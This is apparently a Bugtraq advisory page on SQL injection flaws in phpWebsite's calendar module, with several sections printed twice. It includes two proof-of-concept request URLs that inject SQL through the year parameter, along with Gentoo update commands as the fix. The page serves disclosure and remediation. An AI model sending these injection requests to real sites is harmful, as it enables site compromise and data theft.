PHP Website Calendar Module SQL Injection Vulnerabilities
BID:8390
Info
PHP Website Calendar Module SQL Injection Vulnerabilities
| Bugtraq ID: | 8390 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 11 2003 12:00AM |
| Updated: | Aug 11 2003 12:00AM |
| Credit: | The discovery of this vulnerability has been credited to Lorenzo Hernandez Garcia-Hierro <[email protected]>. |
| Vulnerable: |
phpWebsite phpWebsite 0.9.3 phpWebsite phpWebsite 0.8.3 phpWebsite phpWebsite 0.8.2 phpWebsite phpWebsite 0.7.3 |
| Not Vulnerable: | |
Discussion
PHP Website Calendar Module SQL Injection Vulnerabilities
Multiple SQL injection vulnerabilities have been reported in PHP Website. These issue may be exploited by sending a malicious request to the calendar script. Possible consequencs of exploitation include compromise of the site and disclosure of sensitive information.
Multiple SQL injection vulnerabilities have been reported in PHP Website. These issue may be exploited by sending a malicious request to the calendar script. Possible consequencs of exploitation include compromise of the site and disclosure of sensitive information.
Exploit / POC
PHP Website Calendar Module SQL Injection Vulnerabilities
The following proof of concept has been provided:
http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=
http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1
The following proof of concept has been provided:
http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=
http://www.example.com/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1
Solution / Fix
PHP Website Calendar Module SQL Injection Vulnerabilities
Solution:
Gentoo Linux has released a security advisory (200309-03) to address this issue. Users who are affected by this issue are advised to do the following:
emerge sync
emerge phpwebsite
emerge clean
Solution:
Gentoo Linux has released a security advisory (200309-03) to address this issue. Users who are affected by this issue are advised to do the following:
emerge sync
emerge phpwebsite
emerge clean